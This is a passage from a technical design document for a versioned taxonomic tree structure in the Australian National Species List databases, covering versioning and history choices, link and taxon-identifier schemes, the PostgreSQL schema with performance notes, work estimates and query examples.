distribution data, and the correct interpretation of that data. Since distribution data is part of the\nprofile data requirement now is a good time to tackle this.\n\nTo this end we will make the distribution profile data a JSON object in the profile field containing pointers to\ndistribution data combinations. Distribution data combinations consist of a region and a set of flags in a legal\ncombination much the same way as name_status is set up. We use a JSON field because there is a variable number of regions\nthat can be assigned to a concept (tree_element) and we don't want to make outward pointing join tables to tree_elements.\n\nThis design helps keep trees stand alone, while linking back to distribution combinations and allowing the distribution\ndefinition to be extended, while providing the editor with a configurable set of valid profile combinations.\n\nThe Distribution field of the profile will contain a list of JSON object representations of the distribution combinations\nincluding the id of the combination for update purposes.\n\n=== Archiving\n\nThe data structure allows for archiving of versions by moving\/exporting a tree version. The structure keeps all the data\ncontained in the tree itself. Versions are immutable or read only, and self contained. 
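\n\nA sketch of what archiving a version might look like, assuming the structure above. Note that tree_elements are shared between versions, so only elements no longer referenced by any retained version can be moved out:\n\n[source]\n.archive-version.sql\n----\n-- Sketch: copy one old version out to an archive schema.\nCREATE TABLE archive.tree_version_element AS\n SELECT * FROM tree_version_element WHERE tree_version_id = :version_id;\n\n-- Only archive elements not used by any version we are keeping.\nCREATE TABLE archive.tree_element AS\n SELECT e.* FROM tree_element e\n WHERE EXISTS (SELECT 1 FROM tree_version_element tve\n WHERE tve.tree_element_id = e.id\n AND tve.tree_version_id = :version_id)\n AND NOT EXISTS (SELECT 1 FROM tree_version_element tve\n WHERE tve.tree_element_id = e.id\n AND tve.tree_version_id <> :version_id);\n----\n\n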
Operations that need to interact\nwith the tree are limited to the workspaces\/drafts, and perhaps some advanced search operations on the current version.\n\nBy storing the Name, display string, Rank Path, and links on the tree, older versions can be displayed and queried without\nreferring to the rest of the NSL database, making it possible to have a service which can display the tree as it was from\narchived version in a different database.\n\nThis also means exporting a tree version provides 'all' the data needed to describe the tree.\n\n=== [.line-through]#Composite keys for tree_elements#\n\n\nNOTE: We have moved to a join table for the elements to tree versions so we don't need a composite key. A join table\ndoesn't reduce the advantages except for the identification of nodes to tree elements due to needing a unique tree_element\nid that is not related to node id.\n\nIt would be worth looking at using composite keys for tree_elements made up of the tree_version id and the tree_element id\nthat way we can copy the tree_elements and just change the version number.\n\nThe advantages of this are:\n\n . dramatically reduces the number of id's we have to generate out of the globally unique ID pool\n . intrinsically tracks nodes from one version to the next\n . simplifies the copy process a little\n . may help in diffing trees ( grab all the tree_elements with the same id across versions )\n . lets you very quickly find what an old version of a tree_element looks like now and ask questions like is this in\n the current version without any tree walks.\n\nDisadvantages are:\n\n . Looking up by id always requires the version\n . slightly trickier ORM mapping\n\nI think just advantage 1 outweighs the disadvantages because 100 x 35000 = 3,500,000 new IDs per year when the majority of\nthe data doesn't change. The rest of the advantages come down to speed and efficiency.\n\n=== Auditing\n\nA single updated by and updated at field is required in the tree_element since changes are versioned.\n\n== Transition\n\nWe will identify and replace the existing service endpoints for the Instance Editor to maintain functionality with the\nchange over. The tree editor functionality will need to be changed or incorporated into the Instance Editor. This work\nneeds to happen anyway.\n\n=== Existing history\n\nThere are currently:\n\n * 114k current APC nodes, including 35k taxon nodes and 79k value nodes.\n * 365k taxon nodes for any tree (including the APNI name tree)\n * 7M links.\n * 2995 versioned changes to the APC tree\n\nThe version changes date back to 2012-02-09 via the APC import. Greg Whitbread has suggested that we could discard all the\nhistorical changes up to a point, and considering no one would have relevant links that are currently supported.\n\nLooking in the mapper we only have mapped these older URI:\n\n * apni.name\/\n * apni.publication\/\n * apni.reference\/\n * apni.taxon\/\n\nNone of which refer to tree information, or nodes.\n\nWe currently map 63k node objects in the mapper across all trees, 48k nodes in apni (vascular shard).\n\nThere are 315k taxon nodes out of 365k (apni shard) that are _not_ in the mapper and therefore have never been referenced.\nThere are 67k APC taxon nodes out of 115k APC taxon nodes that are _not_ in the mapper and so haven't been referenced.\nThere are only 5 nodes in the current APC tree that are not in the mapper.\n\nHow much history should we keep? 
We can import from 2016 and delete history later.\n\n=== option 1\n\nBased on the above stats we should be able to work out which of the 2995 versions of the tree we currently have are in\nthe mapper and just replicate those versions to maintain the mapped links. Doable, but tricky.\n\nNOTE: It's possible that we have shared links to nodes that are _not_ in the mapper via the APC taxon exports. These\nlinks are created in SQL, but may not have been created in the mapper because no one has referred to them via the services.\nWe could fix this by adding all nodes since the APC taxon exports started being used (with node links). There are 5 nodes\nin the current APC tree that are not in the mapper.\n\n=== option 2\n\nDraw a line in the sand, then group changes. We can be sure that no links to the tree exist before the NSL was launched,\nso we can ignore all versions before January 2015 (leaving us with 2643 versions). Then group versions into monthly\nreleases and point all node links in that month to the final version of the node for that month. This brings it down to\naround 30 versions.\n\nThis somewhat breaks the contract that what was cited is what we get back; however, the number of citations where the\nchanges incurred matter would, I guess, be approaching zero. I say that because by and large the changes per version are\nfor a single item, so while December 2015 saw 132 versions, each one was for a single name, e.g.\n\n.version changes\n|===\n|note |time stamp\n\n|update name 5416769|2015-12-23 09:34:44.212000 +11:00\n|update name 81345|2015-12-23 09:33:52.836000 +11:00\n|update name 5417736|2015-12-23 09:32:46.223000 +11:00\n|update name 5419222|2015-12-23 09:31:40.348000 +11:00\n|update name 80372|2015-12-23 09:29:25.683000 +11:00\n|add name 80912 to name 80855|2015-12-23 08:49:16.608000 +11:00\n|add name 80899 to name 80855|2015-12-23 08:48:29.840000 +11:00\n|add name 80878 to name 80855|2015-12-23 08:47:15.710000 +11:00\n|===\n\nTake these changes adding excluded names to Correa pulchella J.B.Mackay ex Sweet, which is this node\nhttps:\/\/id.biodiversity.org.au\/node\/apni\/5424450 at 2015-12-23 08:49:16.608000 +11:00 but was a different\nnode 3 minutes earlier. The reality is that these changes were meant to be done as a batch and should only have been\npublished once.\n\n==== option 2a\n\nWe could modify this option to group the changes in a day into a single version, in which case I doubt anyone would notice.\nThis would not dramatically increase the number of versions saved, as tree work seems to be limited to a few days a month,\nwhich comes out as a total of 206 versions from 2015-01-01.\n\n=== Declared BTs\n\nDeclared BT tree_elements will be removed from history and, where we can, the excluded names attached to the BT will\nbe linked to the BT's parent directly. Most of the time this will mean the top of the tree. This will create a consistent\ntree in the history.\n\n=== Existing links\n\nNOTE: A link to a node in the old structure only gives you the structure *below* it as it was when you took the link,\nunless you took a link to a changed node further up the tree, or the top node. Although it is possible to find the\nversion of the tree you were looking at, it was *not* intrinsic in the link. The node identifier is effectively a taxon\nconcept identifier.\n\nWe can take existing published links and forward them to new links. 
Due to history only being maintained in node links\nbelow that node we need node links to point to the latest version that has that node id.\n\nWith the change to using a join table we lose the node_id\/tree_element relationship, so we either need to store the\nnode id(s) in the tree_element or just use the mapper to map to the tree_element.\n\nThe most appropriate solution is to use the mapper to map node URI to tree_elements. They will resolve more appropriately\nto a _taxon identifier_.\n\n==== new links\n\nWe need to be able to encode the version into the tree links since tree_version_element effectively uses a composite key.\n(In the current implementation this element_link in tree_version_element *is* the PK)\n\nLinks currently are structured as ...\/object\/namespace\/number, e.g. node\/apni\/7845073, where the namespace so far\nhas been directly related to the shard. Trees are meant to be above\/separate to shards, so perhaps we should move to\nstoring the shard specifically in the identity structure in the mapper (it's more of a system identifier). This way\nwe can use the namespace as intended and have tree element links like:\n\n ...\/tree\/137\/7845073 i.e. effectively tree\/version\/element\n\nWARNING: The ID of tree_element should be _GLOBALLY UNIQUE_ so it *can* be copied from one tree to another on different\nsystems.\n\nthis lets us map any tree version to any shard\/uber service directly.\n\nThe mapper configuration handles the namespace to system mapping.\n\nThis URL scheme is useful for debugging.\n\nNOTE: Previously links were only created in the mapper when they were requested by the services - This was not intended\n to be the default way to make links, but... So when a workspace is created we do a bulk add of identifiers to\n the mapper. We need to add a bulk add api call on the mapper (done).\n\nThe mapper currently handles around 1.15 million identities without problem, and is designed to scale out via load\nbalancing if needed.\n\nNOTE: tree_elements store links to instance and name. The tree_version_element holds the \"element link\" to itself. The\nelement link is the primary key of the tree_version_element join table.\n\n==== taxon identifiers\n\nSince taxon identifiers exist in multiple versions of different trees (since they represent the taxon concept regardless\nof version) the question becomes how do you resolve a taxon concept? In the sense of this document it becomes clear that\na taxon concept is a fixed representation of the branch below a taxon, and the data contained within the circumscribed\ntaxa. So a taxon concept is fixed or immutable and exists outside of versions (so it may not be the current concept used)\nwhich means we can choose the concept from any version (by definition they are the same).\n\nWARNING: There are significant questions regarding use of taxon ID. Ideally the instance ID *is* the taxon ID\nbut the child taxa are not defined within an instance, they are described on a tree. If you change the sub taxa\nthe instance should change, but if you just haven't fully described the concept represented by the instance then the\ntaxon is the same. A taxon ID as described here represents what has been described in this tree so far, not what the\nconcept represents.\n\n.*_CONCLUSION_*\n\n****\nI have decided for the purposes of getting a working tree that is manageable that we should *not* track and create\ntaxon IDs as such. We can provide a comparison service end point (even a database function) to compare taxa in trees\nat a point. 
The user can compare Instance IDs as the definition of a Concept of a taxon, then compare the two trees'\nrepresentations of that taxon and all its sub taxa. Even if the representation in a tree is slightly different,\nthe taxon they are *trying* to represent may be the same; they just made a mistake or haven't completed the task.\n\nIt can be left as a later exercise to create services that track taxa and validate their use, i.e. if someone re-uses\nan instance in another tree, does it contain *only* the same taxa in the same order?\n****\n\n===== A circumscription hash\n\nSo we could resolve a taxon using something like:\n\nhttp:\/\/id.biodiversity.org.au\/taxon\/80dd7fffd995817fe1a4d4494c519a0c1aa38803b394f69482ab5c794318e0a9\n\nTo generate the hash taxon identifier we use the [.line-through]#tree paths# instance paths of the parent and the\nchildren within that version:\n\nNOTE: We changed from the tree path to the instance path above because the tree element id changes on editing, and it\nbecomes very tricky to track taxon changes, or element changes that have no net effect, e.g. moving a taxon to another\nfamily and then moving it back. By using the instance id path we can use the query below to check if a taxon has changed,\nbecause the instance should not have changed.\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.instance_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\nsee <<A simple sha256_agg function>>\n\nThe circumscribe function above is a unique hash of all the children, in order, under a taxon (including that taxon). The\ncurrent worst-case time for calculation of Plantae is ~2 seconds. When placing a new leaf taxon we need to take the\ntree path of that taxon and recalculate the taxon identifier hash for all the tree_version_elements in that path. Given\nabout 11 levels, those calculations should take less than 22 seconds, and could be updated in the background.\n\nWe can drop the hash and use a simple array of instance ids for comparisons, e.g.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS BIGINT[]\nLANGUAGE SQL\nAS\n$$\nSELECT array_agg(paths)\nFROM (\n SELECT e.instance_id paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.instance_path LIKE path_match || '%'\n ORDER BY e.instance_path\n) AS circumscription;\n$$;\n----\n\nThe difference in speed is around 300ms, which would be significant in bulk operations, and this provides real\ndata that can be used (instance ids).\n\n===== More efficient method\n\nAll tree_elements have a hash of the tree_path. The tree_path (and tree_element as a result) guarantees that the path\nabove matches the taxon, so we only need to include the children to show a difference. We also only need the leaf taxa in\nthe hash, because they contain the path of the entire branch to the top of the tree.\n\n. Leaf tree_version_elements use the hash from the tree_element as the taxon hash.\n. 
When we add a taxon (leaf) we use the tree_element's hash as the new taxon hash, then follow the tree path up, regenerating
the taxon hash for each tree_version_element up the tree as above.

This method would be more efficient in production, but the initial generation is trickier with a reverse tree walk.

==== Even more efficient and pragmatic method

The hash methods have an elephant in the room: hashes. A hash can clash; hashes are good for cases where the data doesn't
exceed the number of available hash values. SHA-256 has a lot of hash values and can represent billions of separate bits of data,
but we can't guarantee there won't be a clash. The best way to use a hash is to reduce the length of the data
represented by the hash. We can determine the uniqueness of a taxon (the circumscription of children and the taxon itself)
using the concatenation of the tree_paths of the leaf tree_elements. This effectively represents the tree; in fact it's just printing
out the tree ids in order (depth first) as a string. The above hash methods take that string and hash it. The string
contains a lot of repetition, but it is unique to this taxon... it *is* this taxon.

At last count we have 5.4 million tree_version_elements, 38 thousand tree_elements, and by the look of it around 40k
individual taxa. *It would be simpler to just assign an ID to a new taxon.* In fact, we already use the node ID to
identify the taxon, so we can just keep them as taxon identifiers and generate new ones when we add a taxon:

. Add (or remove) a leaf element and assign the tree_version_element a new taxon ID.
. Use the tree_path to assign new taxon IDs to all the tree_version_elements up the branch (see the sketch at the end of this section).
. Profit.

===== cons?

If we do this every time a taxon is added to the tree in a draft we will go through a lot of identifiers. We could check
to see if the identifier is new to this version and only change it once per version, but that is probably unnecessary
overhead...

Let's say we add 100 taxa in this version at forma level (about 10 levels down from Plantae), all under the same species:
then we'll use 1100 identifiers (11 per addition) for 110 new taxa.

NOTE: The implementation includes a uniqueness check on taxon identifiers when assigning them within a draft version. This
does a count of tree_version_elements with the taxon identifier; if it returns just 1 then this is the only usage and it is in
a draft, so it can be kept as the taxon identifier, as it hasn't been published.

This scheme doesn't intrinsically tell us if two taxa on different trees are the same. If you copy a taxon from one tree to another
we could use the same identifier, but if you create a copy of a taxon from parts, you would have a new identifier. We can
provide a service to compare taxa, but finding matching taxa across different trees would be relatively expensive (you
could use a tree comparison/diff to identify matches). Once you know two taxa are the same with different IDs you then
need to combine the identifiers somehow, perhaps in a matching service.

NOTE: We have added instance path to tree_elements to help us track/compare taxa. This is because the above method means
a new taxon identifier will be generated when you move a taxon somewhere else then move it back to where it was. There
is no way to check that it's actually the same taxon. So we can use <<A circumscription hash>> on instance_path.
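For illustration, the ID reassignment in the numbered steps of the pragmatic method above could be little more than the
following sketch, reusing the existing nsl_global_seq sequence. The bind parameters are hypothetical, and a real
implementation would also have to refresh taxon_link via the mapper:

[source]
.assign-taxon-ids-sketch.sql
----
-- Give the new leaf and every ancestor in the draft version a fresh taxon id.
-- An ancestor's tree_path is, by construction, a prefix of the leaf's tree_path.
UPDATE tree_version_element tve
SET taxon_id = nextval('nsl_global_seq')
WHERE tve.tree_version_id = :draft_version_id
  AND :new_leaf_tree_path LIKE tve.tree_path || '%';
----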
=== RDF

We will need to map the new tree structure in Joseki. There is a project called nsl-data in the old git
repository. The nsl-data/src/apni.ttl file contains around 400 lines of mapping config (lines 2057 - 2457) which will
need to be reconfigured and deployed.

Currently the RDF services are apparently largely unused, so we should be able to re-map to a structure that makes
sense.

=== Uber trees

The new structure caters for uber trees by easily allowing trees to be copied and providing very fast mechanisms for
search and display. Two million records is certainly not excessive to copy or refer to. It is not expected that people
will edit the uber tree directly, so workspace versions would not normally be required.

We need to provide a mechanism to describe and build an uber tree that potentially watches the component trees to build
the current uber tree.

A two million record tree would be expected to take up around 285MB, based on the estimated data usage figures quoted above
for 35k names.

Doing a select on 4 819 443 tree_version_elements and ordering by name_path on my local machine took 250ms for the
first 2000 rows:

 sql> select te.simple_name, te.name_link, tve.element_link tree_link, tve.name_path
      from tree_element te
      join tree_version_element tve on te.id = tve.tree_element_id
 [2018-11-28 13:46:28] 2000 rows retrieved starting from 1 in 249 ms (execution: 144 ms, fetching: 105 ms)

After optimising PostgreSQL, this came down to 1m 40s for the full result set.

With an index on name_path a search for everything under Eucalyptus on 4.8M tree_elements (159213 results, 2000 fetched)
takes ~200ms.

 sql> select te.simple_name, te.name_link, t.host_name || tve.element_link tree_link, tve.name_path
      from tree_element te
      join tree_version_element tve on te.id = tve.tree_element_id
      join tree t on tve.tree_version_id = t.current_tree_version_id and t.accepted_tree
      where name_path like '%/Eucalyptus/%' order by name_path
 [2018-11-28 13:42:41] 1168 rows retrieved starting from 1 in 203 ms (execution: 137 ms, fetching: 66 ms)

More machine grunt may improve performance. (After optimising PostgreSQL this came down a lot.)

****
My local machine is an i7-4820K 3.70GHz CPU x 4, 32GB machine with a 500GB Samsung SSD. PostgreSQL had not been optimised
for this machine yet.
****

Copying 2 million tree_elements into a new table takes around 9.6s:

 sql> select * into new_tree_elements from tree_element where tree_version_id > 80
 [2017-06-26 17:37:30] completed in 9s 618ms

Given it takes about 12 seconds to copy/insert 35k tree_elements into the tree_elements table to make a workspace,
it should take around 11 minutes to copy an entire 2 million element tree. We shouldn't have to copy the entire uber
tree of this size very often.

NOTE: This copy was done on an older structure. We still copy the draft tree, but the process takes a little longer
because we bulk load the identifiers by sending the list of identifiers to add to the mapper. This process currently
needs some more optimisation.
== What it looks like

image::new-tree-overview.svg[]

== The model

[source]
.DDL.sql
----
    create table tree (
        id int8 default nextval('nsl_global_seq') not null,
        lock_version int8 default 0 not null,
        accepted_tree boolean default false not null,
        config jsonb,
        current_tree_version_id int8,
        default_draft_tree_version_id int8,
        description_html Text default 'Edit me' not null,
        group_name Text not null,
        host_name Text not null,
        link_to_home_page Text,
        name Text not null,
        reference_id int8,
        primary key (id)
    );

    create table tree_element (
        id int8 default nextval('nsl_global_seq') not null,
        lock_version int8 default 0 not null,
        display_html Text not null,
        excluded boolean default false not null,
        instance_id int8 not null,
        instance_link Text not null,
        name_element varchar(255) not null,
        name_id int8 not null,
        name_link Text not null,
        previous_element_id int8,
        profile jsonb,
        rank varchar(50) not null,
        simple_name Text not null,
        source_element_link Text,
        source_shard Text not null,
        synonyms jsonb,
        synonyms_html Text not null,
        updated_at timestamp with time zone not null,
        updated_by varchar(255) not null,
        primary key (id)
    );

    create table tree_version (
        id int8 default nextval('nsl_global_seq') not null,
        lock_version int8 default 0 not null,
        created_at timestamp with time zone not null,
        created_by varchar(255) not null,
        draft_name Text not null,
        log_entry Text,
        previous_version_id int8,
        published boolean default false not null,
        published_at timestamp with time zone,
        published_by varchar(100),
        tree_id int8 not null,
        primary key (id)
    );

    create table tree_version_element (
        element_link Text not null,
        depth int4 not null,
        merge_conflict boolean default false not null,
        name_path Text not null,
        parent_id Text,
        taxon_id int8 not null,
        taxon_link Text not null,
        tree_element_id int8 not null,
        tree_path Text not null,
        tree_version_id int8 not null,
        updated_at timestamp with time zone not null,
        updated_by varchar(255) not null,
        primary key (element_link)
    );
----

Refer to code at
https://github.com/bio-org-au/nsl-domain-plugin/blob/8685491bc3916f5615d9716465fe622c32deebfe/web-app/sql/nsl-ddl.sql#L735[github]

---

IMPORTANT: This has been implemented in production, so the Impact and Amount of work information below is only useful for
retrospective evaluation. Skip to <<Query Examples>>

---
== User impact of change over

Currently in production:

 * a taxon can be added or removed from a tree.
 * the status of the taxon can be changed from accepted to excluded.
 * the comment and distribution values on the tree can be updated, but are not used, as instance notes are used instead.

Synonymy does not affect the tree structure as such, as that is related to the concepts that are placed on the tree only.
There is no current process to determine if changes to synonymy of taxon concepts (instances) affect the tree, in terms
of the rules governing placements.

Placement rules are currently poorly implemented and incomplete.

In the change over, the initial goal will be to replace the existing functionality. We should be able to do this without
major impact or change.

== Amount of work

Three main functional areas are affected by this change:

 . Search
 . Display
 . Editing
We would also need to factor out NameTreePath as it is replaced by the new TreeElement and the APNI name tree.

I'm guesstimating the amount of work to be around 340 hours in total, which depending on other work could be completed
in 8 weeks.

=== APNI Name Tree

Now would be the right time to replace the APNI name tree if we're going to do that. JIRA NSL-2304 discusses the issues
around the name tree being replaced. There is definitely a current need for a tree structure that caters for names that
aren't in the APC/taxonomic tree.

The solution suggested in NSL-2304 is to replace Name.sortName with a tree path as per the tree_element and existing
name_tree_path, and putting the "agreed" family of a name in the name where that name is below family. A name id path
would be a logical addition to speed up any other name path operations, but we may say
https://en.wikipedia.org/wiki/You_aren%27t_gonna_need_it[YAGNI] on this initially.

To do this we would, in order:

. copy the APC name path to all names in APC
. copy the APC name path to all synonyms of names on the tree
. follow name.parent up the tree for names not in APC until we reach a name in APC to build their path.

In the last step we can stop once we hit a name with a name path, which makes this more of a functional step.

This still means editors should put the immediate parent of a name in, not the "Name parent", as we're still using the
name tree as a filler for what isn't in APC.

=== Search and display

==== Services

In the current services we use a search including the tree_nodes to determine if a name is on a tree and where it is
ranked on that tree. We also look to see if a name is in APC to display an APC tick. This has been generalised somewhat
to allow different "accepted" trees.

We need to refactor:

|===
|work| notes| effort
| search and APC/APNIFormat outputs.| -| 20h
| tree path code to use the tree_element | will mostly be deleting code that keeps up with tree_node changes| 20h
| The APNI name tree needs to be replaced | just use the name parent, and make sure Family comes from the accepted
tree only. Extra time allowed for implementation discussion.|40h
| tree services API | most of it is deleted.| 40h
| Tree object representation| -|20h
| flat view taxon and name exports | rework the view| 10h
| test infrastructure and tests| -| 30h
|| -|180h
|===

Obviously the existing tree structure is used extensively in the services for the "tree services", but most of that will
just go and be replaced with a much simpler set of code.
The search service and APNI/APC format output are the only
other places that use them, along with name_tree_path.

===== Object representation in HTML/JSON

Currently the tree nodes are modeled with an output object which in HTML looks like
https://biodiversity.org.au/nsl/services/node/apni/9159708

The JSON version exposes too much of the tree infrastructure by using terminology like "subnodes", links and some random
RDF stuff.

https://biodiversity.org.au/nsl/services/node/apni/9159708.json

Most of the following snippet is useless to anyone consuming the data.

[source,javascript]
.node_snippet.js
----
{
  "class": "au.org.biodiversity.nsl.Link",
  "typeUri": {
    "idPart": "btOf",
    "nsPart": "apc-voc",
    "uri": "http://biodiversity.org.au/voc/apc/APC#btOf",
    "uriEncoded": "http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23btOf",
    "qname": "apc-voc:btOf",
    "css": "apc-voc bt-of"
  },
  "subNode": {
    "class": "au.org.biodiversity.nsl.Node",
    "_links": {
      "permalink": {
        "link": "https://id.biodiversity.org.au/node/apni/9159707",
        "preferred": true,
        "resources": 1
      }
    },
    "id": 9159707,
    "type": "T",
    "typeUri": {
      "idPart": "ApcConcept",
      "nsPart": "apc-voc",
      "uri": "http://biodiversity.org.au/voc/apc/APC#ApcConcept",
      "uriEncoded": "http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23ApcConcept",
      "qname": "apc-voc:ApcConcept",
      "css": "apc-voc apc-concept"
    }
  },
  "linkSeq": 1,
  "versioningMethod": {
    "enumType": "au.org.biodiversity.nsl.VersioningMethod",
    "name": "V"
  },
  "isSynthetic": true
},
----

We'll replace the HTML page with something very similar for now and completely restructure the JSON output to better
represent the taxon in the context of the tree.

e.g.

[source,javascript]
.treeElement.js
----
{

  "treeElement": {
    "class": "au.org.biodiversity.nsl.TreeElement",
    "_links": {
      "elementLink": "http://test-id-vasc.biodiversity.org.au/tree/9476777/9479620",
      "taxonLink": "http://test-id-vasc.biodiversity.org.au/node/apni/2908938",
      "parentElementLink": "http://test-id-vasc.biodiversity.org.au/tree/9476777/9479431",
      "nameLink": "http://test-id-vasc.biodiversity.org.au/name/apni/54576",
      "instanceLink": "http://test-id-vasc.biodiversity.org.au/instance/apni/650575",
      "sourceElementLink": null
    },
    "tree": {
      "class": "au.org.biodiversity.nsl.Tree",
      "_links": {
        "permalinks": [
          {
            "link": "https://test-id-vasc.biodiversity.org.au/tree/apni/APC",
            "preferred": true,
            "resources": 1
          }
        ]
      },
      "audit": null,
      "name": "APC"
    },
    "simpleName": "Juncaginaceae",
    "rankPath": {
      "Ordo": {
        "id": 214965.0,
        "name": "Alismatales",
        "name_link": "http://test-id-vasc.biodiversity.org.au/name/apni/214965"
      },
      "Regnum": {
        "id": 54717.0,
        "name": "Plantae",
        "name_link": "http://test-id-vasc.biodiversity.org.au/name/apni/54717"
      },
      "Classis": {
        "id": 223519.0,
        "name": "Equisetopsida",
        "name_link": "http://test-id-vasc.biodiversity.org.au/name/apni/223519"
      },
      "Familia": {
        "id": 54576.0,
        "name": "Juncaginaceae",
        "name_link": "http://test-id-vasc.biodiversity.org.au/name/apni/54576"
      },
      "Division": {
        "id": 224706.0,
        "name": "Charophyta",
\"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/224706\"\n },\n \"Superordo\": {\n \"id\": 216053.0,\n \"name\": \"Lilianae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/216053\"\n },\n \"Subclassis\": {\n \"id\": 214954.0,\n \"name\": \"Magnoliidae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214954\"\n }\n },\n \"namePath\": \"Plantae\/Charophyta\/Equisetopsida\/Magnoliidae\/Lilianae\/Alismatales\/Juncaginaceae\",\n \"displayString\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"sourceShard\": \"APNI\",\n \"synonyms\": null,\n \"profile\": {\n \"APC Dist.\": {\n \"value\": \"WA (naturalised), NT, SA, Qld, NSW (native and naturalised), LHI, ACT, Vic (native and naturalised), Tas\",\n \"created_at\": \"2009-09-08T00:00:00+10:00\",\n \"created_by\": \"KIRSTENC\",\n \"updated_at\": \"2009-09-08T00:00:00+10:00\",\n \"updated_by\": \"KIRSTENC\",\n \"source_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instanceNote\/apni\/1110848\"\n }\n },\n \"children\": [\n {\n \"displayHtml\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"excluded\": false,\n \"depth\": 7,\n \"synonymsHtml\": \"<synonyms><\/synonyms>\"\n },\n\n ...\n\n {\n \"displayHtml\": \"<data><scientific><name id='215455'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific><citation>CHAH (2006), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479645\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/215455\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/635661\",\n \"excluded\": false,\n \"depth\": 9,\n \"synonymsHtml\": \"<synonyms><tax><scientific><name id='103161'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><tax><scientific><name id='7377413'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6833' title='Gardner, C.A.'>C.A.Gardner<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><\/synonyms>\"\n }\n ]\n }\n\n}\n----\n\n\n\n==== Editor\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only 
|refactor models| the DB models need to be replaced with new models, hopefully returning only relevant data| 40h
|refactor the tree editing tab| with the refactoring of the tree edit service end points this should be a minimal change,
only replacing some of the reference keys like the voc:AcpComment stuff.| 40h
|||90h
|===

The editor uses views to check if a name is currently accepted:

 * accepted_name_vw
 * accepted_synonym_vw

We would need to change code around type_code, which relates directly to tree_node.type_uri_id_part.

The editor also models

 * TreeArrangement
 * TreeLink
 * TreeNode
 * TreeUriNs
 * TreeValueUri
 * AcceptedConcept
 * AcceptedInSomeWay

which would all need refactoring for usage.

There are two different editors for the tree in the instance editor; the current AngularJS based one can be removed
completely and be replaced with the workspace based one that uses the following service end points:

 * treeEdit/updateValue
 * treeEdit/placeNameOnTree
 * treeEdit/removeNameFromTree

==== New tree editor

|===
|work| notes| effort
|Add admin tasks to admin pages| This should be a straightforward form| 20h
|Add a tree view| This should already be part of the new tree_element object display replacing the node object| included
|rework validation code| see services | included
|||20h
|===

This editor needs to be incorporated in the instance editor. The new structure will make this easier, but this is
possibly not required in the first iteration of this change.

Basically we need to be able to create trees and workspaces and publish or delete a workspace. Create and delete are
part of the existing API on the services.

We will make the basic tree administration part of the existing services and incorporate the editing into the instance
editor. We will develop a tree view for both the editor and services - where the editor view will allow access to
instance editing etc.

We will re-implement the validation code on the new tree structure as a callable service, and as part of the placement
actions.

==== New search

|===
|work| notes| effort
|convert views| mostly simple changes but need to handle node type| 10h
|refactor models| the DB models need to be replaced with new models, hopefully returning only relevant data| 40h
|||50h
|===

The new search app uses the following views:

 * accepted_name_vw
 * accepted_synonym_vw
 * instance_resource_vw
 * name_instance_vw
 * name_or_synonym_vw

It models:

 * TreeArrangement
 * TreeNode

== Other stuff

At the moment the name tree has namespaces, and the lichen name tree has 31 Fungi namespaced names. This doesn't work at
the moment as a tree can only have one namespace.
I have changed the lichen names to all have the same namespace (Lichen)
so that the current name tree works, kind of....

But this is going to bring up a problem we'll have to deal with when we have intersecting trees.

== Query Examples

This section is for documenting some query examples using the new tree structure.

=== Search for synonyms of a type in a tree

[source,sql]
.search-synonyms.sql
----
SELECT
  el.name_id,
  el.simple_name,
  tax_syn,
  synonyms ->> tax_syn,
  rank.name,
  type.name,
  el.name_path
FROM tree_element el
